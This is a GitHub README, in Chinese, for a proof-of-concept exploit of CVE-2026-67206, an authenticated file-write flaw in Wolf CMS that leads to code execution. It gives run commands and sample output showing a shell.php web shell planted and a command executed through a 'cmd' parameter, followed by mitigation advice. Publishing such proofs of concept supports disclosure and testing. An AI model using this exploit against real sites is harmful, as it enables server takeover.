anirbala98/CVE-2026-67206
GitHub: anirbala98/CVE-2026-67206
针对 Wolf CMS 任意文件写入导致 RCE 漏洞(CVE-2026-67206)的概念验证漏洞利用工具。
Stars: 1 | Forks: 0
# CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - 通过任意文件写入实现 RCE
此仓库包含针对 CVE-2026-67206 的概念验证(PoC)漏洞利用代码。
## 免责声明
本项目仅供教育目的和授权安全测试使用。请勿将其用于您不拥有或未经授权测试的系统。
## 概述
Wolf CMS 0.8.3.1 及之前版本中存在一个任意文件写入漏洞。它允许经过身份验证的攻击者通过 `FileManagerController.php` 的 `create_file()` 和 `save()` 函数,将恶意的任意文件写入 Web 根目录的 `/public` 目录中。`FileManagerController.php` 的 `create_file()` 函数未对文件扩展名进行验证,从而允许经过身份验证的攻击者写入恶意 PHP 脚本并获得远程代码执行权限。
## 受影响版本
Wolf CMS 0.8.3.1 及之前的所有版本均受到影响。Wolf CMS 仓库已于 2021 年 8 月 28 日被归档,且不再积极维护。目前没有针对此漏洞的补丁。
## 环境要求
- Python 3.13.14
- Requests 2.32.5
- Beautifulsoup4 4.15.0
## 安装说明
```
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
```
## 使用说明
```
python exploit.py -u -p
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
```
## 示例
```
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data
```
## 缓解措施
- 基于白名单验证经过身份验证的用户创建的文件扩展名
- 禁止 `.php`、`.phtml`、`.phar`、`.php5` 等扩展名,除非确有必要
- 禁止在 Web 服务器根目录的上传目录中执行 PHP
- 如果可能,将创建的文件保存在其他服务器上,以最大程度减少影响
## 参考资料
- https://www.tenable.com/cve/CVE-2026-67206
- https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
标签:PoC, Python, Web安全, 威胁模拟, 字符串匹配, 安全, 无后门, 暴力破解, 蓝队分析, 超时处理, 逆向工具